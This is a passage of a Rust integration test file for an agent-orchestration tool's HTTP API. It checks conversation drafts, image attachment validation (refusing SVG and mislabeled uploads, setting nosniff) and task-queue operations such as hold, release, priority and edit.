5789 let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
5790 let (release_tx, release_rx) = std::sync::mpsc::channel();
5791 ui.set_busy_queue_gate(BusyQueueGate {
5792 reached: reached_tx,
5793 release: release_rx,
5794 });
5795
5796 let handler = tokio::spawn(talk_say(
5797 State(Arc::clone(&ui)),
5798 Path(id.clone()),
5799 Ok(Json(NewTalkTurn {
5800 text: "what does the queue module do?".to_owned(),
5801 attachments: Vec::new(),
5802 })),
5803 ));
5804
5805 tokio::time::timeout(Duration::from_secs(5), reached_rx)
5810 .await
5811 .unwrap_or_else(|_| {
5812 panic!(
5813 "attempt {attempt}: talk {id} never reached the busy branch's queue write"
5814 )
5815 })
5816 .expect("the busy branch dropped the gate without using it");
5817
5818 let running = talks.get(&id).expect("reload talk");
5825 drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
5826
5827 handler.abort();
5831 let _ = handler.await;
5832
5833 let _ = release_tx.send(());
5839
5840 let mut fresh = talks.get(&id).expect("reload talk");
5843 for _ in 0..SETTLE_STEPS {
5844 if fresh.pending.is_empty() && fresh.turns.len() == 2 {
5845 break;
5846 }
5847 tokio::time::sleep(Duration::from_millis(10)).await;
5848 fresh = talks.get(&id).expect("reload talk");
5849 }
5850 assert!(
5851 fresh.pending.is_empty() && fresh.turns.len() == 2,
5852 "attempt {attempt}: talk {id} left the operator's text queued \
5853 with no drainer - the reclaimed turn was dropped along with \
5854 the handler future (pending {:?}, {} turns)",
5855 fresh.pending,
5856 fresh.turns.len()
5857 );
5858 }
5859 }
5860
5861 #[tokio::test]
5862 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
5863 let (_tmp, _repo, f) = talk_fixture().await;
5864 let id = f.post("/api/talks", None).await.json()["id"]
5865 .as_str()
5866 .expect("id")
5867 .to_owned();
5868 let store = f.talks();
5869 let mut recovered = store.get(&id).expect("opened talk");
5870 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5871 .expect("persist pending draft without a live turn");
5872
5873 let edited = f
5874 .post(
5875 &format!("/api/talks/{id}/pending/edit"),
5876 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
5877 )
5878 .await;
5879 assert_eq!(edited.status, 200, "{}", edited.body);
5880 assert!(edited.json()["thinking"].as_bool().unwrap());
5881
5882 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
5883 for _ in 0..SETTLE_STEPS {
5884 if detail["turns"].as_array().expect("turns").len() == 2 {
5885 break;
5886 }
5887 tokio::time::sleep(Duration::from_millis(10)).await;
5888 detail = f.get(&format!("/api/talks/{id}")).await.json();
5889 }
5890 let turns = detail["turns"].as_array().expect("turns");
5891 assert_eq!(
5892 turns.len(),
5893 2,
5894 "the recovered draft must run once: {detail}"
5895 );
5896 assert_eq!(turns[0]["body"], "corrected");
5897 assert_eq!(detail["pending"], "");
5898 }
5899
5900 #[tokio::test]
5901 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
5902 let tmp = TempDir::new().expect("tempdir");
5903 let repo = tmp.path().join("repo");
5904 std::fs::create_dir_all(&repo).expect("repo dir");
5905 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5906 let f = Fixture::with_repo(repo).await;
5907 let id = f.post("/api/talks", None).await.json()["id"]
5908 .as_str()
5909 .expect("id")
5910 .to_owned();
5911 let store = f.talks();
5912 let mut recovered = store.get(&id).expect("opened talk");
5913 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5914 .expect("persist pending draft without a live turn");
5915
5916 let refused = f
5917 .post(
5918 &format!("/api/talks/{id}/say"),
5919 Some(r#"{"text":"new message"}"#),
5920 )
5921 .await;
5922 assert_eq!(refused.status, 409, "{}", refused.body);
5923 assert!(refused.body.contains("resume"), "{}", refused.body);
5924 let saved = store.get(&id).expect("draft remains after refusal");
5925 assert!(saved.turns.is_empty());
5926 assert_eq!(saved.pending, "saved before restart");
5927
5928 let say_path = format!("/api/talks/{id}/say");
5929 let (first, second) = tokio::join!(
5930 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
5931 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
5932 );
5933 assert_eq!(first.status, 409, "{}", first.body);
5934 assert_eq!(second.status, 409, "{}", second.body);
5935 let saved = store
5936 .get(&id)
5937 .expect("draft remains after concurrent refusals");
5938 assert!(saved.turns.is_empty());
5939 assert_eq!(saved.pending, "saved before restart");
5940
5941 let resumed = f
5942 .post(&format!("/api/talks/{id}/pending/resume"), None)
5943 .await;
5944 assert_eq!(resumed.status, 202, "{}", resumed.body);
5945 let duplicate = f
5946 .post(&format!("/api/talks/{id}/pending/resume"), None)
5947 .await;
5948 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
5949
5950 for _ in 0..SETTLE_STEPS {
5951 if store.get(&id).expect("talk").turns.len() == 2 {
5952 break;
5953 }
5954 tokio::time::sleep(Duration::from_millis(10)).await;
5955 }
5956 let finished = store.get(&id).expect("finished talk");
5957 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5958 assert_eq!(finished.turns[0].body, "saved before restart");
5959 assert!(finished.pending.is_empty());
5960 }
5961
5962 #[tokio::test]
5963 async fn an_image_only_recovered_draft_resumes_without_text() {
5964 let (_tmp, _repo, f) = talk_fixture().await;
5965 let id = f.post("/api/talks", None).await.json()["id"]
5966 .as_str()
5967 .expect("id")
5968 .to_owned();
5969 let uploaded = f
5970 .post_bytes(
5971 &format!("/api/talks/{id}/attachments"),
5972 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
5973 PNG_BYTES,
5974 )
5975 .await;
5976 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
5977 let attachment = f
5978 .talks()
5979 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
5980 .expect("attachment metadata")
5981 .expect("stored attachment");
5982 let store = f.talks();
5983 let mut recovered = store.get(&id).expect("opened talk");
5984 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
5985
5986 let resumed = f
5987 .post(&format!("/api/talks/{id}/pending/resume"), None)
5988 .await;
5989 assert_eq!(resumed.status, 202, "{}", resumed.body);
5990 for _ in 0..SETTLE_STEPS {
5991 if store.get(&id).expect("talk").turns.len() == 2 {
5992 break;
5993 }
5994 tokio::time::sleep(Duration::from_millis(10)).await;
5995 }
5996 let finished = store.get(&id).expect("finished talk");
5997 assert_eq!(finished.turns.len(), 2, "{finished:?}");
5998 assert!(finished.turns[0].body.is_empty());
5999 assert_eq!(finished.turns[0].attachments.len(), 1);
6000 assert!(finished.pending_attachments.is_empty());
6001 }
6002
6003 #[tokio::test]
6004 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
6005 let (_tmp, _repo, f) = talk_fixture().await;
6006 let id = f.post("/api/talks", None).await.json()["id"]
6007 .as_str()
6008 .expect("id")
6009 .to_owned();
6010 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6011 assert_eq!(closed.status, 200, "{}", closed.body);
6012 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6013 .expect("serialize closed talk");
6014 for (path, body) in [
6015 (format!("/api/talks/{id}/pending/resume"), None),
6016 (
6017 format!("/api/talks/{id}/pending/clear"),
6018 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
6019 ),
6020 (
6021 format!("/api/talks/{id}/pending/edit"),
6022 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
6023 ),
6024 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
6025 ] {
6026 let response = f.post(&path, body).await;
6027 assert_eq!(response.status, 409, "{}", response.body);
6028 }
6029 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6030 .expect("serialize closed talk");
6031 assert_eq!(
6032 after_clear, before_clear,
6033 "clear must not rewrite a closed talk"
6034 );
6035 }
6036
6037 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
6040
6041 #[tokio::test]
6042 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
6043 let tmp = TempDir::new().expect("tempdir");
6044 let repo = tmp.path().join("repo");
6045 std::fs::create_dir_all(&repo).expect("repo dir");
6046 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6047 let f = Fixture::with_repo(repo).await;
6048 let id_a = f.post("/api/talks", None).await.json()["id"]
6049 .as_str()
6050 .unwrap()
6051 .to_owned();
6052 let id_b = f.post("/api/talks", None).await.json()["id"]
6053 .as_str()
6054 .unwrap()
6055 .to_owned();
6056
6057 let a = f
6058 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
6059 .await;
6060 assert_eq!(a.status, 202, "{}", a.body);
6061 assert_eq!(a.json()["thinking"], true);
6062 let b = f
6063 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
6064 .await;
6065 assert_eq!(b.status, 202, "{}", b.body);
6066 assert_eq!(b.json()["thinking"], true);
6067
6068 let listed = f.get("/api/talks").await.json();
6069 for id in [&id_a, &id_b] {
6070 let view = listed
6071 .as_array()
6072 .unwrap()
6073 .iter()
6074 .find(|talk| talk["id"] == *id)
6075 .unwrap();
6076 assert_eq!(view["thinking"], true, "{listed}");
6077 }
6078 let repeated = f
6079 .post(
6080 &format!("/api/talks/{id_a}/say"),
6081 Some(r#"{"text":"again"}"#),
6082 )
6083 .await;
6084 assert_eq!(repeated.status, 202, "{}", repeated.body);
6085 assert_eq!(repeated.json()["pending"], "again");
6086 }
6087
6088 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
6091
6092 #[tokio::test]
6093 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
6094 let f = Fixture::start().await;
6095 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
6096
6097 let res = f
6098 .post_bytes(
6099 &format!("/api/talks/{id}/attachments"),
6100 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6101 PNG_BYTES,
6102 )
6103 .await;
6104 assert_eq!(res.status, 201, "{}", res.body);
6105 let body = res.json();
6106 assert_eq!(body["name"], "shot.png");
6107 assert_eq!(body["mime"], "image/png");
6108 assert_eq!(body["bytes"], PNG_BYTES.len());
6109 let att_id = body["id"].as_str().expect("id").to_owned();
6110 assert_eq!(
6111 att_id.len(),
6112 32,
6113 "the id must never be a client-suppliable path: {att_id}"
6114 );
6115
6116 let got = f
6117 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
6118 .await;
6119 assert_eq!(got.status, 200, "{}", got.body);
6120 assert_eq!(got.header("content-type"), Some("image/png"));
6121 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
6122 assert_eq!(got.bytes, PNG_BYTES);
6123 }
6124
6125 #[tokio::test]
6126 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
6127 let f = Fixture::start().await;
6128 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
6129
6130 let svg = f
6133 .post_bytes(
6134 &format!("/api/talks/{id}/attachments"),
6135 &[("Content-Type", "image/svg+xml")],
6136 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
6137 )
6138 .await;
6139 assert!(
6140 (400..500).contains(&svg.status),
6141 "svg must be refused: {} {}",
6142 svg.status,
6143 svg.body
6144 );
6145 assert!(svg.body.contains("SVG"), "{}", svg.body);
6146
6147 let text = f
6148 .post_bytes(
6149 &format!("/api/talks/{id}/attachments"),
6150 &[("Content-Type", "text/plain")],
6151 b"just some text",
6152 )
6153 .await;
6154 assert!(
6155 (400..500).contains(&text.status),
6156 "an unlisted type must be refused: {} {}",
6157 text.status,
6158 text.body
6159 );
6160
6161 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
6164 let big = f
6165 .post_bytes(
6166 &format!("/api/talks/{id}/attachments"),
6167 &[("Content-Type", "image/png")],
6168 &oversized,
6169 )
6170 .await;
6171 assert_eq!(
6172 big.status,
6173 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
6174 "{}",
6175 big.body
6176 );
6177 }
6178
6179 #[tokio::test]
6180 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
6181 let f = Fixture::start().await;
6182 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
6183
6184 let res = f
6187 .post_bytes(
6188 &format!("/api/talks/{id}/attachments"),
6189 &[("Content-Type", "image/png")],
6190 b"<html>not a picture</html>",
6191 )
6192 .await;
6193 assert!((400..500).contains(&res.status), "{}", res.body);
6194 }
6195
6196 #[tokio::test]
6197 async fn an_unknown_attachment_id_is_a_404() {
6198 let f = Fixture::start().await;
6199 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6200
6201 let res = f
6202 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6203 .await;
6204 assert_eq!(res.status, 404, "{}", res.body);
6205 }
6206
6207 #[tokio::test]
6208 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6209 let f = Fixture::start().await;
6210 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6211
6212 let uploaded = f
6213 .post_bytes(
6214 &format!("/api/talks/{id}/attachments"),
6215 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6216 PNG_BYTES,
6217 )
6218 .await;
6219 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6220 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6221
6222 let res = f
6223 .post(
6224 &format!("/api/talks/{id}/say"),
6225 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6226 )
6227 .await;
6228 assert_eq!(res.status, 202, "{}", res.body);
6229 let queued = res.json();
6230 let turns = queued["turns"].as_array().expect("turns array");
6231 assert_eq!(
6232 turns.len(),
6233 1,
6234 "an empty body with an attachment is still a turn: {queued}"
6235 );
6236 assert_eq!(turns[0]["who"], "operator");
6237 assert_eq!(turns[0]["body"], "");
6238 let atts = turns[0]["attachments"]
6239 .as_array()
6240 .expect("attachments array");
6241 assert_eq!(atts.len(), 1);
6242 assert_eq!(atts[0]["id"], att_id);
6243 assert_eq!(atts[0]["mime"], "image/png");
6244
6245 let on_disk = f.talks().get(&id).expect("get");
6248 assert_eq!(on_disk.turns[0].attachments.len(), 1);
6249 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6250 }
6251
6252 #[tokio::test]
6253 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6254 let f = Fixture::start().await;
6255 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6256
6257 let res = f
6258 .post(
6259 &format!("/api/talks/{id}/say"),
6260 Some(&format!(
6261 r#"{{"text":"hi","attachments":["{}"]}}"#,
6262 "a".repeat(32)
6263 )),
6264 )
6265 .await;
6266 assert!((400..500).contains(&res.status), "{}", res.body);
6267 assert!(res.body.contains("unknown attachment"), "{}", res.body);
6268
6269 let on_disk = f.talks().get(&id).expect("get");
6270 assert!(
6271 on_disk.turns.is_empty(),
6272 "a rejected attachment id must not partially record the turn: {:?}",
6273 on_disk.turns
6274 );
6275 }
6276
6277 #[tokio::test]
6278 async fn talk_close_makes_the_talk_refuse_further_turns() {
6279 let f = Fixture::start().await;
6280 let id = seed_talk(&f, "20260904-014455-cd34", "open");
6281
6282 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6283 assert_eq!(closed.status, 200, "{}", closed.body);
6284 assert_eq!(closed.json()["status"], "closed");
6285
6286 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6288 assert_eq!(closed_again.status, 200);
6289 assert_eq!(closed_again.json()["status"], "closed");
6290
6291 let said = f
6292 .post(
6293 &format!("/api/talks/{id}/say"),
6294 Some(r#"{"text":"too late"}"#),
6295 )
6296 .await;
6297 assert_eq!(said.status, 409, "{}", said.body);
6298 }
6299
6300 #[tokio::test]
6301 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6302 let (_tmp, _repo, f) = talk_fixture().await;
6303 let id = f.post("/api/talks", None).await.json()["id"]
6304 .as_str()
6305 .expect("id")
6306 .to_owned();
6307 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6308 assert_eq!(closed.status, 200, "{}", closed.body);
6309
6310 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6311 assert_eq!(reopened.status, 200, "{}", reopened.body);
6312 assert_eq!(reopened.json()["status"], "open");
6313
6314 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6316 assert_eq!(reopened_again.status, 200);
6317 assert_eq!(reopened_again.json()["status"], "open");
6318
6319 let said = f
6320 .post(
6321 &format!("/api/talks/{id}/say"),
6322 Some(r#"{"text":"still there?"}"#),
6323 )
6324 .await;
6325 assert_eq!(
6326 said.status, 202,
6327 "a reopened talk accepts turns again: {}",
6328 said.body
6329 );
6330 }
6331
6332 #[tokio::test]
6333 async fn talk_reopen_on_an_unknown_id_is_404() {
6334 let f = Fixture::start().await;
6335 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6336 assert_eq!(res.status, 404, "{}", res.body);
6337 }
6338
6339 #[tokio::test]
6340 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6341 let f = Fixture::start().await;
6342 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6343
6344 let deleted = f.delete(&format!("/api/talks/{id}")).await;
6345 assert_eq!(deleted.status, 204, "{}", deleted.body);
6346
6347 let after = f.get(&format!("/api/talks/{id}")).await;
6348 assert_eq!(after.status, 404, "{}", after.body);
6349
6350 let listed = f.get("/api/talks").await.json();
6351 assert!(
6352 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6353 "a deleted talk must not linger in the list: {listed}"
6354 );
6355 }
6356
6357 #[tokio::test]
6358 async fn talk_delete_on_an_unknown_id_is_404() {
6359 let f = Fixture::start().await;
6360 let res = f.delete("/api/talks/nonexistent-id").await;
6361 assert_eq!(res.status, 404, "{}", res.body);
6362 }
6363
6364 #[tokio::test]
6365 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6366 let f = Fixture::start().await;
6367 let queue = f.queue();
6368 let mut task = Task::new(
6369 "spent".to_owned(),
6370 "Try again".to_owned(),
6371 PathBuf::from("/repo/magi"),
6372 Source::Human,
6373 );
6374 task.start("20260902-140502-bbbb".to_owned());
6375 task.fail("agent gave up", 9);
6376 queue.put(&mut task).expect("file the task");
6377
6378 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6379 assert_eq!(held.status, 200);
6380 assert_eq!(held.json()["status_str"], "held");
6381
6382 let released = f
6383 .post(&format!("/api/queue/{}/release", task.id), None)
6384 .await;
6385 assert_eq!(released.status, 200);
6386 assert_eq!(released.json()["status_str"], "queued");
6387 assert_eq!(
6388 released.json()["attempts"],
6389 0,
6390 "release is a real second chance, not an instant re-hold"
6391 );
6392 assert_eq!(
6393 queue.get(&task.id).expect("reload").status,
6394 TaskStatus::Queued,
6395 "the change is on disk, not only in the reply"
6396 );
6397 assert!(
6398 !f.home
6399 .path()
6400 .join("queue")
6401 .join(format!("{}.lock", task.id))
6402 .exists(),
6403 "the claim the mutation took is released again"
6404 );
6405 }
6406
6407 #[tokio::test]
6408 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6409 let f = Fixture::start().await;
6410 let queue = f.queue();
6411 let mut task = Task::new(
6412 "busy".to_owned(),
6413 "Running right now".to_owned(),
6414 PathBuf::from("/repo/magi"),
6415 Source::Human,
6416 );
6417 queue.put(&mut task).expect("file the task");
6418 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6419
6420 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6421
6422 assert_eq!(res.status, 409);
6423 assert_eq!(
6424 queue.get(&task.id).expect("reload").status,
6425 TaskStatus::Queued,
6426 "the refused hold changed nothing"
6427 );
6428 }
6429
6430 #[tokio::test]
6431 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6432 let f = Fixture::start().await;
6433 let queue = f.queue();
6434 let mut task = Task::new(
6435 "waiting on the migration".to_owned(),
6436 "Do the thing".to_owned(),
6437 PathBuf::from("/repo/magi"),
6438 Source::Human,
6439 );
6440 queue.put(&mut task).expect("file the task");
6441
6442 let held = f
6443 .post(
6444 &format!("/api/queue/{}/hold", task.id),
6445 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6446 )
6447 .await;
6448 assert_eq!(held.status, 200, "{}", held.body);
6449 assert_eq!(held.json()["status_str"], "held");
6450 assert_eq!(
6451 held.json()["hold_reason"],
6452 "waiting for 20260101-000000-aaaa to land"
6453 );
6454
6455 let listed = f.get("/api/queue").await.json();
6456 assert_eq!(
6457 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6458 "the card reads the reason off the same list route"
6459 );
6460
6461 let mut plain = Task::new(
6464 "no reason given".to_owned(),
6465 "Do another thing".to_owned(),
6466 PathBuf::from("/repo/magi"),
6467 Source::Human,
6468 );
6469 queue.put(&mut plain).expect("file the task");
6470 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6471 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6472 assert!(held_plain.json()["hold_reason"].is_null());
6473
6474 let released = f
6475 .post(&format!("/api/queue/{}/release", task.id), None)
6476 .await;
6477 assert_eq!(released.status, 200);
6478 assert!(
6479 released.json()["hold_reason"].is_null(),
6480 "a release must clear the reason so the next hold does not inherit it"
6481 );
6482 }
6483
6484 #[tokio::test]
6485 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6486 let f = Fixture::start().await;
6487 let queue = f.queue();
6488 let mut older = Task::new(
6489 "filed first".to_owned(),
6490 "x".to_owned(),
6491 PathBuf::from("/repo/magi"),
6492 Source::Human,
6493 );
6494 older.id = "20260101-000001-aaaa".to_owned();
6495 let mut newer = Task::new(
6496 "filed second".to_owned(),
6497 "x".to_owned(),
6498 PathBuf::from("/repo/magi"),
6499 Source::Human,
6500 );
6501 newer.id = "20260101-000002-bbbb".to_owned();
6502 queue.put(&mut older).expect("file older");
6503 queue.put(&mut newer).expect("file newer");
6504
6505 let before = f.get("/api/queue").await.json();
6508 assert_eq!(before[0]["id"], newer.id);
6509 assert_eq!(before[1]["id"], older.id);
6510
6511 let raised = f
6515 .post(
6516 &format!("/api/queue/{}/priority", older.id),
6517 Some(r#"{"priority":10}"#),
6518 )
6519 .await;
6520 assert_eq!(raised.status, 200, "{}", raised.body);
6521 assert_eq!(raised.json()["priority"], 10);
6522
6523 let after = f.get("/api/queue").await.json();
6524 let names: Vec<&str> = after
6525 .as_array()
6526 .unwrap()
6527 .iter()
6528 .map(|t| t["id"].as_str().unwrap())
6529 .collect();
6530 assert_eq!(names[0], older.id, "the raised task now sorts first");
6534 }
6535
6536 #[tokio::test]
6537 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6538 let f = Fixture::start().await;
6539 let queue = f.queue();
6540 let mut task = Task::new(
6541 "in flight".to_owned(),
6542 "x".to_owned(),
6543 PathBuf::from("/repo/magi"),
6544 Source::Human,
6545 );
6546 task.start("20260902-140502-bbbb".to_owned());
6547 queue.put(&mut task).expect("file the task");
6548
6549 let res = f
6550 .post(
6551 &format!("/api/queue/{}/priority", task.id),
6552 Some(r#"{"priority":9}"#),
6553 )
6554 .await;
6555 assert_eq!(res.status, 400, "{}", res.body);
6556 assert!(
6557 res.json()["error"]
6558 .as_str()
6559 .is_some_and(|e| e.contains("running")),
6560 "{}",
6561 res.body
6562 );
6563 assert_eq!(
6564 queue.get(&task.id).expect("reload").priority,
6565 0,
6566 "the refused write must not partially apply"
6567 );
6568 }
6569
6570 #[tokio::test]
6571 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6572 let f = Fixture::start().await;
6573 let queue = f.queue();
6574 let mut task = Task::new(
6575 "old title".to_owned(),
6576 "old instruction".to_owned(),
6577 PathBuf::from("/repo/magi"),
6578 Source::Agent {
6579 run: "20260101-000000-beef".to_owned(),
6580 node: "implement".to_owned(),
6581 },
6582 );
6583 task.runs.push("20260101-000000-beef".to_owned());
6584 queue.put(&mut task).expect("file the task");
6585 let created_at = task.created_at;
6586
6587 let edited = f
6588 .post(
6589 &format!("/api/queue/{}/edit", task.id),
6590 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6591 )
6592 .await;
6593 assert_eq!(edited.status, 200, "{}", edited.body);
6594 let body = edited.json();
6595 assert_eq!(body["title"], "new title");
6596 assert_eq!(body["instruction"], "new instruction");
6597 assert_eq!(body["id"], task.id, "editing must not mint a new id");
6598 assert_eq!(body["created_at"], created_at.to_string());
6599 assert_eq!(
6600 body["source"]["kind"], "agent",
6601 "editing a task an agent filed must not turn it human: {body}"
6602 );
6603 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6604
6605 let reloaded = queue.get(&task.id).expect("reload");
6606 assert_eq!(reloaded.title, "new title");
6607 assert_eq!(reloaded.instruction, "new instruction");
6608 }
6609
6610 #[tokio::test]
6611 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6612 let f = Fixture::start().await;
6613 let queue = f.queue();
6614 let mut task = Task::new(
6615 "in flight".to_owned(),
6616 "do not touch".to_owned(),
6617 PathBuf::from("/repo/magi"),
6618 Source::Human,
6619 );
6620 task.start("20260902-140502-bbbb".to_owned());
6621 queue.put(&mut task).expect("file the task");
6622
6623 let res = f
6624 .post(
6625 &format!("/api/queue/{}/edit", task.id),
6626 Some(r#"{"title":"x","instruction":"y"}"#),
6627 )
6628 .await;
6629 assert_eq!(res.status, 400, "{}", res.body);
6630 assert!(
6631 res.json()["error"]
6632 .as_str()
6633 .is_some_and(|e| e.contains("running")),
6634 "{}",
6635 res.body
6636 );
6637 assert_eq!(
6638 queue.get(&task.id).expect("reload").instruction,
6639 "do not touch",
6640 "the refused edit must not change the file"
6641 );
6642 }
6643
6644 #[tokio::test]
6645 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6646 let f = Fixture::start().await;
6647 let queue = f.queue();
6648 let mut task = Task::new(
6649 "busy".to_owned(),
6650 "Running right now".to_owned(),
6651 PathBuf::from("/repo/magi"),
6652 Source::Human,
6653 );
6654 queue.put(&mut task).expect("file the task");
6655 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6656
6657 let priority = f
6658 .post(
6659 &format!("/api/queue/{}/priority", task.id),
6660 Some(r#"{"priority":9}"#),
6661 )
6662 .await;
6663 assert_eq!(priority.status, 409, "{}", priority.body);
6664
6665 let edit = f
6666 .post(
6667 &format!("/api/queue/{}/edit", task.id),
6668 Some(r#"{"title":"x","instruction":"y"}"#),
6669 )
6670 .await;
6671 assert_eq!(edit.status, 409, "{}", edit.body);
6672 }
6673
6674 #[tokio::test]
6675 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
6676 let f = Fixture::start().await;
6677 let queue = f.queue();
6678 let mut task = Task::new(
6679 "shipped by hand".to_owned(),
6680 "merged outside the loop".to_owned(),
6681 PathBuf::from("/repo/magi"),
6682 Source::Agent {
6683 run: "20260101-000000-b455".to_owned(),
6684 node: "implement".to_owned(),
6685 },
6686 );
6687 task.runs.push("20260101-000000-b455".to_owned());
6688 task.runs.push("20260101-000000-9af4".to_owned());
6689 queue.put(&mut task).expect("file the task");
6690 let created_at = task.created_at;
6691
6692 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6693 assert_eq!(done.status, 200, "{}", done.body);
6694 assert_eq!(done.json()["status_str"], "done");
6695
6696 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
6697 assert_eq!(
6698 reloaded.runs,
6699 ["20260101-000000-b455", "20260101-000000-9af4"]
6700 );
6701 assert_eq!(
6702 reloaded.source,
6703 Source::Agent {
6704 run: "20260101-000000-b455".to_owned(),
6705 node: "implement".to_owned(),
6706 }
6707 );
6708 assert_eq!(reloaded.created_at, created_at);
6709 }
6710
6711 #[tokio::test]
6712 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
6713 let f = Fixture::start().await;
6718 let queue = f.queue();
6719 let mut task = Task::new(
6720 "landed while held".to_owned(),
6721 "x".to_owned(),
6722 PathBuf::from("/repo/magi"),
6723 Source::Human,
6724 );
6725 task.hold_manual(Some("waiting on 3ed9".to_owned()));
6726 queue.put(&mut task).expect("file the held task");
6727
6728 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6729 assert_eq!(done.status, 200, "{}", done.body);
6730 assert_eq!(done.json()["status_str"], "done");
6731 assert!(
6732 done.json()["hold_reason"].is_null(),
6733 "a done task cannot still be waiting on something: {}",
6734 done.body
6735 );
6736 }
6737
6738 #[tokio::test]
6739 async fn unknown_ids_are_json_not_found_on_both_stores() {
6740 let f = Fixture::start().await;
6741
6742 let run = f.get("/api/runs/nosuchrun").await;
6743 let task = f.post("/api/queue/nosuchtask/hold", None).await;
6744
6745 assert_eq!(run.status, 404);
6746 assert_eq!(task.status, 404);
6747 assert!(
6748 run.json()["error"]
6749 .as_str()
6750 .is_some_and(|e| e.contains("run")),
6751 "the error names what was not found: {}",
6752 run.body
6753 );
6754 assert!(
6755 task.json()["error"]
6756 .as_str()
6757 .is_some_and(|e| e.contains("task")),
6758 "the error names what was not found: {}",
6759 task.body
6760 );
6761 }
6762
6763 #[tokio::test]
6764 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
6765 let f = Fixture::start().await;
6766
